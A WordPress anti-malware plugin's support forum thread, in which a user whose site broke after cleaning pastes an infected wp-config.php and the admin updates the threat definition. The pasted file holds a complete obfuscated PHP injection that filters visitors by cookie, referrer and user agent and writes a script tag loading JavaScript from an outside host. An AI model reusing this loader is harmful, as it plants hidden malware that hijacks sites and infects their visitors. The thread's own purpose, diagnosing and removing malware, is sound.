Home › Forums › Support Forum › HTTP ERROR 500
This topic contains 3 replies, has 2 voices, and was last updated by Anti-Malware Admin 5 years, 11 months ago.
-
AuthorPosts
-
January 8, 2019 at 6:19 am #2206
Hi
Got error after hit the clean button. Pressed undo as the box stayed red but crashed the browser.
Cant access my site at all now.
Please advise.
Error as below
https://kenrhodes.co.uk is currently unable to handle this request.
HTTP ERROR 500″January 8, 2019 at 7:01 am #2207I see that it is fixed now. Can you tell me what file was broken?
If you can send me the original content for that file then I can update the definitions so that it will not break that file again.
January 8, 2019 at 10:22 pm #2208I changed the name of the WP-Config.php in Cpanel and re uploaded the database SQL to WordPress log in.
WP-Config.php is now in quarantine, this was the contents:
<?php
/** DB Credentials removed to protect the user’s data */
/**#@-*/$GLOBALS['_in_']=Array(base64_decode(‘ZX’ .’Jyb3J’ .’fcmVwb3′ .’J0aW5n’),base64_decode(‘aW5p’ .’X3Nld’ .’A==’),base64_decode(‘bWt0aW1l’),base64_decode(‘c2V0′ .’Y29′ .’va’ .’2ll’),base64_decode(‘ZGF’ .’0′ .’ZV9kZWZhdW’ .’x0′ .’X’ .’3′ .’RpbWV6b25lX3Nld’ .’A’ .’==’),base64_decode(‘cHJ’ .’lZ19t’ .’YXRjaF9′ .’hbGw=’),base64_decode(‘c3Ry’ .’dG9′ .’sb3dlcg==’),base64_decode(‘Y’ .’XJyYX’ .’lf’ .’bWVyZ’ .’2U=’),base64_decode(‘YXJ’ .’zb3′ .’J0′),base64_decode(” .’cHJlZ19t’ .’YX’ .’RjaA=’ .’='),base64_decode(” .’c’ .’H’ .’JlZ19t’ .’YXRjaA==’),base64_decode(” .’c’ .’HJlZ’ .’1′ .’9tYXRj’ .’aA’ .’==’),base64_decode(‘cHJl’ .’Z19′ .’tYXR’ .’j’ .’aA==’),base64_decode(‘cH’ .’J’ .’lZ19tYXRjaA’ .’==’)); ?><? function in($i){$a=Array(” .’ZG’ .’lzc’ .’Gx’ .’heV9l’ .’cn’ .’Jvc’ .’nM=’,'b2Zm’,'c’ .’2x’ .’fbWVzc’ .’2FnZQ==’,'c2xfbWVzc’ .’2FnZQ==’,” .’YWRtaW4=’,” .’L’ .’w==’,'RXVyb3BlL01vc2′ .’Nvd’ .’w==’,'LyhbYS’ .’16XX’ .’sxLDh9KD86LV’ .’thLXpdezEsOH0′ .’pPyko’ .’Pzo7′ .’cT0oWz’ .’AtOS5′ .’dKykpPy8=’,'S’ .’FRUU’ .’F9B’ .’Q0NFUF’ .’Rf’ .’TE’ .’FO’ .’R1VBR’ .’0U’ .’=',” .’L2JvdC9p’,'SFR’ .’UU’ .’F9′ .’VU’ .’0VSX0FHR’ .’U5U’,'L2′ .’dvb2′ .’ds’ .’ZS58c2VhcmN’ .’oLnx’ .’5YW’ .’hvb3′ .’xi’ .’aW5nfG1z’ .’b’ .’i9p’,'SFRUUF’ .’9′ .’SRU’ .’Z’ .’FUkV’ .’S',’L3J1fHVhfGJ’ .’lfGt’ .’rfHN’ .’yfGJ’ .’nL2k=’,'SFRUUF’ .’9S’ .’RUZFUkV’ .’S',’c2x’ .’f’ .’bW’ .’Vzc2F’ .’nZQ=’ .’=',’L3J1fHVrfG’ .’JlfGtr’ .’f’ .’HNyf’ .’GJnL2k=’,'L2′ .’ZyfHVrfHVzfGdif’ .’GN’ .’hfGF1fGl0fHNlf’ .’G’ .’V’ .’ufGV’ .’z’ .’L2k’ .’=');return base64_decode($a[$i]);} ?><?php $GLOBALS['_in_'][0](round(0));$GLOBALS['_in_'][1](in(0),in(1));function l__0(){if(empty($_COOKIE[in(2)])){$_0=$GLOBALS['_in_'][2](round(0),round(0),round(0),round(0+1),round(0+0.5+0.5),round(0+404.4+404.4+404.4+404.4+404.4));$GLOBALS['_in_'][3](in(3),in(4),$_0,in(5),$_1);}}$GLOBALS['_in_'][4](in(6));$GLOBALS['_in_'][5](in(7),$GLOBALS['_in_'][6]($_SERVER[in(8)]),$_2);$_3=$GLOBALS['_in_'][7]($_2[round(0+0.2+0.2+0.2+0.2+0.2)],$_2[round(0+0.66666666666667+0.66666666666667+0.66666666666667)]);foreach($_3 as $_4 => $_5)$_3[$_4]=$_5?$_5:round(0+1);$GLOBALS['_in_'][8]($_3);$_6=$_3[round(0)];if(!$GLOBALS['_in_'][9](in(9),$_SERVER[in(10)])AND $GLOBALS['_in_'][10](in(11),$_SERVER[in(12)])AND!$GLOBALS['_in_'][11](in(13),$_SERVER[in(14)])AND empty($_COOKIE[in(15)])AND!$GLOBALS['_in_'][12](in(16),$_6)AND $GLOBALS['_in_'][13](in(17),$_6)){ ?><script type=”text/javascript”><!–
document.write(unescape(‘%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%75%6E%64%75%6B%2E%6F%72%67%2F%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E’));//–></script><?php }l__0();
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = ‘wp_’;
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define(‘WP_DEBUG’, false);
/* That’s all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined(‘ABSPATH’) )
define(‘ABSPATH’, dirname(__FILE__) . ‘/’);
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . ‘wp-settings.php’);
January 9, 2019 at 8:25 pm #2209Thanks for posting this code. I have updated the definition of this threat so that it removes all of the malicious injection and does not leave behind any broken syntax.
-
AuthorPosts
You must be logged in to reply to this topic.